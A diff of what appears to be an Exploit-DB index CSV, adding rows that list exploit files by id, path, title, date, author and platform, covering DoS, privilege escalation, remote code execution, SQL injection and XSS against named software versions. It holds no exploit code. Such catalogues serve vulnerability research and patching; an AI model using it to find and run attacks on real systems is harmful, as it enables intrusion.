 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
 47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
+47963,exploits/windows/dos/47963.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
 47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
@@ -10814,6 +10823,7 @@ id,file,description,date,author,type,platform,port
 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
 47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
+47081,exploits/freebsd/local/47081.sh,"FreeBSD 12.0 - 'fd' Local Privilege Escalation",2019-07-10,gr4yf0x,local,freebsd,
 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
@@ -10858,6 +10868,8 @@ id,file,description,date,author,type,platform,port
 47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
 47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
+47409,exploits/ios/local/47409.txt,"iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation",2019-09-23,"Umang Raghuvanshi",local,ios,
+47411,exploits/windows/local/47411.py,"Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH)",2019-09-24,x00pwn,local,windows,
 47421,exploits/linux/local/47421.rb,"ABRT - sosreport Privilege Escalation (Metasploit)",2019-09-25,Metasploit,local,linux,
 47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,
 47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows,
@@ -10865,6 +10877,7 @@ id,file,description,date,author,type,platform,port
 47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux,
 47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64,
 47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
+47476,exploits/windows/local/47476.py,"DeviceViewer 3.12.0.1 - Arbitrary Password Change",2019-10-09,"Alessandro Magnosi",local,windows,
 47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
@@ -10880,6 +10893,7 @@ id,file,description,date,author,type,platform,port
 47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
 47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
 47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
+47526,exploits/xml/local/47526.txt,"Winrar 5.80 - XML External Entity Injection",2019-10-21,hyp3rlinx,local,xml,
 47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
@@ -10991,6 +11005,7 @@ id,file,description,date,author,type,platform,port
 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
 47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
 47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
+47981,exploits/windows/local/47981.txt,"Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution",2020-01-30,"Eduardo Braun Prado",local,windows,
 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
 48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
@@ -18052,11 +18067,13 @@ id,file,description,date,author,type,platform,port
 47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
 47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
+47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,
 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
+47157,exploits/android/remote/47157.txt,"Android 7 < 9 - Remote Code Execution",2019-07-24,"Marcin Kozlowski",remote,android,
 47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
 47187,exploits/php/remote/47187.rb,"WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
 47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
@@ -18146,6 +18163,9 @@ id,file,description,date,author,type,platform,port
 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
 48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
 48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
+48194,exploits/windows/remote/48194.txt,"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows,
+48195,exploits/windows/remote/48195.txt,"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows,
+48196,exploits/linux/remote/48196.txt,"CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)",2020-03-11,AkkuS,remote,linux,
 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
@@ -42141,6 +42161,7 @@ id,file,description,date,author,type,platform,port
 47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
 47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80
 47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,UserX,webapps,php,80
+47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",2019-07-25,"Giovanni Chhatta",webapps,php,
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
@@ -42192,6 +42213,7 @@ id,file,description,date,author,type,platform,port
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
 47295,exploits/php/webapps/47295.html,"WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
+47299,exploits/php/webapps/47299.php,"Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation",2019-08-21,"Jak Gibb",webapps,php,
 47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,
 47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows,
 47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
@@ -42208,16 +42230,19 @@ id,file,description,date,author,type,platform,port
 47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,
 47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80
 47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80
+47330,exploits/linux/webapps/47330.rb,"Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)",2019-09-02,"James Bercegay",webapps,linux,
 47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,
 47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,
 47338,exploits/multiple/webapps/47338.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting",2019-09-02,Aetsu,webapps,multiple,
 47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple,
 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
+47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,
 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
+47359,exploits/php/webapps/47359.txt,"Publisure Hybrid - Multiple Vulnerabilities",2019-09-06,"Jean-Marie Bourbon",webapps,php,
 47361,exploits/php/webapps/47361.pl,"WordPress Core 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
 47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
 47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple,
@@ -42237,6 +42262,7 @@ id,file,description,date,author,type,platform,port
 47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
 47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,
+47391,exploits/jsp/webapps/47391.go,"NetGain EM Plus 10.1.68 - Remote Command Execution",2019-09-16,azams,webapps,jsp,
 47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,
 47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,
@@ -42245,6 +42271,7 @@ id,file,description,date,author,type,platform,port
 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
 47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,
+47413,exploits/php/webapps/47413.py,"Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection",2019-09-24,"Nassim Asrir",webapps,php,
 47417,exploits/aspx/webapps/47417.txt,"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting",2019-09-25,"Davide Cioccia",webapps,aspx,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
 47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
@@ -42266,9 +42293,11 @@ id,file,description,date,author,type,platform,port
 47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80
 47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
 47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
+47443,exploits/php/webapps/47443.rb,"WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion",2019-09-30,"Ahmad Almorabea",webapps,php,
 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,
 47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
+47449,exploits/multiple/webapps/47449.txt,"DotNetNuke 9.3.2 - Cross-Site Scripting",2019-10-01,"Semen Alexandrovich Lyhin",webapps,multiple,
 47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
 47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
@@ -42517,6 +42546,7 @@ id,file,description,date,author,type,platform,port
 48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
 48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,
 48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php,
+48023,exploits/php/webapps/48023.txt,"VehicleWorkshop 1.0 - 'bookingid' SQL Injection",2020-02-07,"Mehran Feizi",webapps,php,
 48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php,
 48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
 48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
@@ -42526,16 +42556,23 @@ id,file,description,date,author,type,platform,port
 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
 48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
+48058,exploits/php/webapps/48058.txt,"WordPress Plugin Tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
+48059,exploits/php/webapps/48059.txt,"WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
+48061,exploits/php/webapps/48061.txt,"WordPress Plugin Wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
+48062,exploits/php/webapps/48062.txt,"WordPress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
 48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
 48076,exploits/php/webapps/48076.txt,"WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
 48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
 48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
 48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php,
 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
+48088,exploits/php/webapps/48088.txt,"WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting",2020-02-17,Shahab.ra.9,webapps,php,
 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
+48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php,
 48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
@@ -42585,6 +42622,9 @@ id,file,description,date,author,type,platform,port
 48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
 48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
 48197,exploits/php/webapps/48197.txt,"WordPress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
+48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php,
+48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php,
+48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php,
 48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
 48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
@@ -42594,14 +42634,18 @@ id,file,description,date,author,type,platform,port
 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
+48213,exploits/php/webapps/48213.txt,"WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification",2020-03-13,"Nawaf Alkeraithe",webapps,php,
 48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,
 48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,
 48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php,
 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
+48222,exploits/php/webapps/48222.txt,"UADMIN Botnet 1.0 - 'link' SQL Injection",2020-03-17,n4pst3r,webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
+48230,exploits/php/webapps/48230.txt,"Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload",2020-03-18,qw3rTyTy,webapps,php,
 48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
+48238,exploits/php/webapps/48238.txt,"Wordpress Plugin PicUploader 1.0 - Remote File Upload",2020-03-23,"Milad karimi",webapps,php,
 48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
 48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
@@ -42618,6 +42662,7 @@ id,file,description,date,author,type,platform,port
 48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,
 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
+48278,exploits/php/webapps/48278.txt,"PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution",2020-04-02,Unkn0wn,webapps,php,
 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
 48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
 48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
@@ -42626,6 +42671,7 @@ id,file,description,date,author,type,platform,port
 48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
